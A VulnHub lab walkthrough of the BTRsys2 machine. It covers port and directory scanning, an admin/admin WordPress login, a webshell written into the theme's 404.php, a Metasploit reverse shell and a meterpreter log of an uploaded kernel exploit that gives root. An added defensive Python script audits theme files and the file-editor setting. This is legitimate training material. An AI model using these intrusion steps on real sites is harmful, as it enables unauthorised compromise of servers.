BTRsys2

Author: Conn606 | Published: 2021-03-10 15:58

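    VulnHub machine walkthrough: BTRsys2

    1. Information gathering: the target host is found at 192.168.65.132

    2. nmap port scan: nmap -T4 -A -v 192.168.65.132

    3. Browse to port 80 and run a directory scan

    4. Open robots.txt; it reveals a wordlist

    5. Try weak passwords on the login page; login succeeds (username=admin passwd=admin)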


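    6. A file upload is found under Posts; the upload fails

    7. An editor is found under Appearance; it allows editing PHP files

    8. Write a one-line webshell into the theme file, request http://192.168.65.132/wordpress/wp-content/themes/twentyfourteen/404.php, and AntSword connects successfully

    8. Reverse shell with msf

    9. Privilege escalation

    9.1 Check the current system information

    9.2 Look for kernel vulnerabilities

    9.3 Compile and upload; privilege escalation succeeds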
    meterpreter > upload /home/kali/Desktop/exploit
    [*] uploading  : /home/kali/Desktop/exploit -> exploit
    [*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
    [*] uploaded   : /home/kali/Desktop/exploit -> exploit
    meterpreter > shell
    Process 1286 created.
    Channel 3 created.
    pwd
    /var/www/html/wordpress/wp-content/themes/twentyfourteen
    ls -lh
    total 832K
    -rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
    -rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
    -rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
    -rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
    -rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
    -rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
    -rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
    -rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
    -rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
    -rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
    -rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
    -rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
    -rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
    drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
    -rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
    -rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
    -rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
    drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
    -rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
    -rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
    -rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
    -rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
    -rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
    -rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
    -rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
    -rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
    -rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
    -rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
    -rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
    chmod 777 exp*
    ./exp*
    bash: cannot set terminal process group (840): Inappropriate ioctl for device
    bash: no job control in this shell
    root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen# 
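
From the defender's side, steps 7 and 8 and the directory listing above point at two checkable conditions: the dashboard file editor was enabled, and the theme files were world-writable, with a C source file and a compiled binary left next to them. The following audit is an added example, not part of the original post; the function names and the `THEME_EXTS` allowlist are assumptions of this example, while `DISALLOW_FILE_EDIT` is the WordPress constant that turns the theme/plugin editor off.

```python
import os
import re
import stat

# File types expected in a stock theme directory (allowlist assumed for this example).
THEME_EXTS = {".php", ".css", ".js", ".png", ".jpg", ".gif", ".svg", ".txt",
              ".json", ".po", ".mo", ".pot", ".eot", ".ttf", ".woff", ".woff2"}
EDIT_LOCK = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)


def editor_disabled(wp_root):
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true."""
    try:
        with open(os.path.join(wp_root, "wp-config.php"),
                  encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return False
    # Drop // and # line comments so a commented-out define does not count.
    text = re.sub(r"^\s*(//|#).*$", "", text, flags=re.M)
    return bool(EDIT_LOCK.search(text))


def audit_themes(wp_root):
    """Return sorted (relative_path, finding) pairs for wp-content/themes."""
    findings = []
    themes = os.path.join(wp_root, "wp-content", "themes")
    for dirpath, _dirs, files in os.walk(themes):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, wp_root)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue  # skip symlinks, sockets, devices
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            try:
                with open(path, "rb") as fh:
                    magic = fh.read(4)
            except OSError:
                magic = b""
            ext = os.path.splitext(name)[1].lower()
            if magic == b"\x7fELF":
                findings.append((rel, "ELF binary in web root"))
            elif ext not in THEME_EXTS:
                findings.append((rel, "unexpected file type"))
    return sorted(findings)
```

Run against the WordPress root, for example `audit_themes("/var/www/html/wordpress")`; any finding in the theme tree, or `editor_disabled()` returning False, is worth fixing before the weak admin password is.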
    
